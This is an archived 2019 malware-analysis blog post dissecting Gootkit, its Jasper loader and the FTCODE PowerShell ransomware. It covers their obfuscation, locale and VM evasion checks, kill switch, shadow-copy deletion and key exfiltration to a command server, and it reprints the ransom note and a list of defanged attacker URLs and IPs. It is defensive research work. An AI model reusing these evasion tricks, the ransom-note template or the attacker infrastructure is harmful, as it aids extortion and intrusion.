Nicht so goot - breaking down gootkit and jasper (+ ftcode) By f0wL Published: 2019-10-02 · Archived: 2026-04-05 23:42:42 UTC Wed 02 October 2019 in Banking-Malware Pun intended. Gootkit is one of the most spread banking malware at the moment and I deemed it a good opportunity to deobfuscate a bit of scrambled code A short disclaimer: downloading and running the samples linked below will compromise your computer and data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live. Gootkit Stage 3 Sample available @ Hybrid Analysis --> 3e846a7316dbc15a38cfd522b14ad3f1a72d79959cbae9fd14621400d77cbc37 https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html Page 1 of 10 With the obfuscated Javascript and VB Script samples I thought it would be a good idea to build a simple python script to clean up the mess Jasper Loader left us. If I come across a newer version I'll update the script, other than that Forks and PRs are always welcome as well. The VB script as a first stage isn't really that sophisticated. Basically the 2947 lines of one ASCII character each represented as an integer with "302" added to it are each converted back to a char and added to the string fjuu which gets executed via WScript after the decoding is complete. The dumped command is once again a long powershell command with a base64 segment. https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html Page 2 of 10 This PS snippet will download and display the weird online pet store order confirmation and the second stage of the Jasper Loader (an obfuscated Javascript file). The JS Stage includes a few unused variables, entangled functions and scrambled strings. These strings are then concancated to one big string in an array which in turn is used in two replacement functions and then gets split. The last step is a loop which calls the geejc function and selects every second character from the array to form the final powershell payload. The PS command contains a base64 encoded string which I decoded as a separate step in the script. Pretty easy so far... https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html Page 3 of 10 Probably the easiest way to identify a Jasper Loader is by looking at the characteristic conditional at the top of the decoded base64 segment. First it checks the the localization of the UI for Systems from China, Romania, Russia, Ukraine or Belarus and exits if this condition is true. Jasper will also quit if the WMI Computer_Model query returns a string related to a VM Guest system for anti-analysis and sandbox evasion purposes. https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html Page 4 of 10 A Setup Information (.inf) file dropped by the PE payload. Looks like we've got some anti-analysis tricks with this binary as well...either way IDA Free does not really like it and complains about being unable to fetch the Imports 🤔 Scrambled Import Address Table anyone ? We'll take a closer peak later Another Version of the Gootkit/Jasper combo surfaced on September 26th when they swapped out the 3rd stage payload with FTCODE. Against the believe of some researchers this PowerShell based ransomware is not new and was first spotted in 2013 by Sophos Analysts as decribed in this article. The Link to the Any.Run Analysis of the malicious Word Document can be found here. https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html Page 5 of 10 The malicios macro in the Word document will download and execute the FTCODE PowerShell ransomware right away. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $atwsxvg = [string][System.Text.Encoding Maybe a reference to the developer/ group behind this attack? We won't know for sure, but the string "BXCODE hack your system" is present in all recent occurences of FTCODE. Ladies and Gentlemen, this is the part of the code that gave today's ransomware it's name. It will append the extension .FTCODE to every encrypted file and drop a HTML ransomnote in the respective directories. Again, this PS script also features the "kill switch"/ evasion technique found in Jasper. https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html Page 6 of 10 Communication with the C&C Server is accomplished via System.Net.Webclient and POST commands to the hardcoded address. In this case the victim ID (a UUID) and the generated encryption key are transmitted (in plain text, a packet capture would get you the key and therefore your data back without paying the cyber-criminals :D ). Looks like FTCODE actually has a killswitch: A if a file called w00log03.tmp is present in %PUBLIC%\OracleKit the ransomware will create a new file called good_day.log and exit. Another run-of-the-mill behaviour of ransomware these days is to disable the recovery mode, delete the system backups and shadow copies. So nothing really new here either.. FTCODE will encrypt all files with the follwing extensions: "*.sql","*.mp4","*.7z","*.rar","*.m4a","*.wma","*.avi","*.wmv","*.csv","*.d3dbsp","*.zip","*.sie","* The ransomnote, dropped as a HTML file with the filename READ_ME_NOW.htm # All your files was encrypted! Your personal ID: **$whyjfdxez** Your personal KEY: $gdejthseee 1. Download Tor browser - [https://www.torproject.o 2. Install Tor browser https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html Page 7 of 10](https://www.torproject.org/download/) 3. Open Tor Browser 4. Open link in TOR browser: **http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.o** **5. Follow the instructions on this page** **## ***** Warning***** Do not rename files Do not try to back your data using third-party software, it may cause permanent data loss(If you d As evidence, we can for free back one file Decoders of other users is not suitable to back your files - encryption key is created on your com Twitter user treetone alterted possible victims not to pay the ransom since he did not recieve a decryptor after paying the ransom for a client. Obviously there are different reports about the steps after paying the ransom as shown below. As reported by BleepingComputer Forum User Hidemik paying the Ransom will redirect the victim to a page with the instructions to run the following PowerShell Script (I removed the Base64 encoded RSA Key): https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html Page 8 of 10** IOCs Gootkit (SHA256) 3e846a7316dbc15a38cfd522b14ad3f1a72d79959cbae9fd14621400d77cbc37 Malicious .docm (SHA256) https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html Page 9 of 10 bf1fae0bca74eb3e788985734c750e33949e24f44f4c6e76c615aa70a80ea175 Related Files (SHA256) 93aef539b491ecd4f3e3bfad2b226e8026d3335e457f5d8ba903e1d76686633e --> feat-chewy-shipping-confirmation 3721af6150db2082e6f8342c450070b835a46311c2fade9e1cd5598727d7db4f --> index.js e6c58e32c151f2e9e44cd8bc98cdf12373a7f8fc40262e1c4402f2eb6d191d1e --> invoice_confirmation_53467823886 URLs hxxp://getpdfreader.13stripesbrewery[.]com/pdf.php?MTo7Njc2NDk3 hxxp://rejoiner[.]com/resources/wp-content/uploads/2017/04/feat-chewy-shipping-confirmation.jpg hxxp://ont.carolinabeercompany[.]com/bolp.cab hxxp://wws.tkgventures[.]com/ (Source Port: 49207/ 50769, 194.76.224[.]108:80) hxxp://z2g3mtkwotm4[.]top/ (Source Port: 52742/ 52745, 35.187.36[.]248:80) hxxps://adp.reevesandcompany[.]com/rbody320 (176.10.125[.]87:443) hxxp://picturecrafting[.]site (208.91.197.91) hxxp://ogy5mtkwotm4[.]top hxxp://mjvjmtkwotm4[.]top hxxp://otnhmtkwotm4[.]top hxxp://zgzimtkwotm4[.]top hxxp://cofee.theshotboard[.]net/?need=uuid&vid=dc1:loadjs& hxxp://aweb.theshotboard[.]info/?page=xing&vid=dc1:load hxxp://aweb.theshotboard[.]info/ver=926.3&guid=VICTIM-ID+PASSWD hxxp://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd[.]onion/?guid=VICTIM-ID hxxp://home.tith[.]in/seven.sat hxxp://connect.simplebutmatters[.]com (185.158.248[.]151) hxxp://home.isdes[.]com (31.214.157[.]3) hxxp://home.southerntransitions[.]net (31.214.157[.]3) Source: https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html Page 10 of 10